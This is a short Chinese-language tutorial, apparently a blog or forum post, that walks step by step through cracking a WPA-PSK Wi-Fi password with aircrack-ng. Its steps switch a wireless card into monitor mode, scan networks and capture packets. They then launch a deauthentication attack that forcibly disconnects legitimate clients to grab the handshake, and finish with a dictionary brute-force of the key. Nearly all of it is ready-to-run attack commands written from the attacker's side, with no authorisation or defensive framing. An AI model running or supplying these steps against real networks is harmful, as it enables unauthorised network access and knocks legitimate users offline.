1、传统的WPA-PSK加密破解:
WPA-PSK的破解基于WPA-PSK握手验证报文数据的获取与识别,攻击者只要能够获取到WPA-PSK握手数据报文,就可以导入Aircrack-ng 进行暴力破解,下面将破解WPA-PSK的标准步骤列举,然后将其中最关键的步骤予以详细说明。
注意:wlan0为无线网卡名称,mon0为处于激活状态下的无线网卡名称,eth0为有线网卡
步骤:
- 检查无线网卡芯片的设置模式:iwconfig wlan0
- 将无线网卡芯片的模式从”Managed”设置为”monitor”模式
先: ifconfig wlan0 down
然后:iwconfig wlan0 mode monitor
- 激活无线网卡:
Ifconfig wlan0 up
- 启动无线网卡的监控模式:
Airmon-ng start wlan0
- 用airmon-ng 工具,抓包,进行预探测,来获取当前无线网络概况,包括AP的SSID、MAC地址、工作频道、无线客户端的MAC地址及数量等。
Airodump-ng mon0
- 开始捕获无线数据包,也可以使用--ivs参数来设定只捕获ivs数据
Airodump-ng -w 文件名 -c 频道 mon0
- 进行Deauth攻击获取WPA握手报文
Aireplay-ng -0 10 -a AP的mac -c 客户端的mac wlan0
说明:和WEP时不同,这里为了获取破解所需的WPA-PSK握手验证的整个完整数据包,无线黑客们将会发送一种称之为“Deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开,此时,客户端就会自动重新连接无线路由器,黑客们便有机会捕获到包含WPA-PSK握手验证的完整数据包。
参数解释:
-0,采用deauth攻击模式,后面跟上攻击次数,这里是10,大家可以根据实际情况设置为5-10不等;
-a,后面跟上AP的MAC地址
-c,后跟客户端的MAC地址;
- 破解WPA密码:
Aircrack-ng -w dic 捕获的cap文件
参数解释:
-w ,后跟预先制作的字典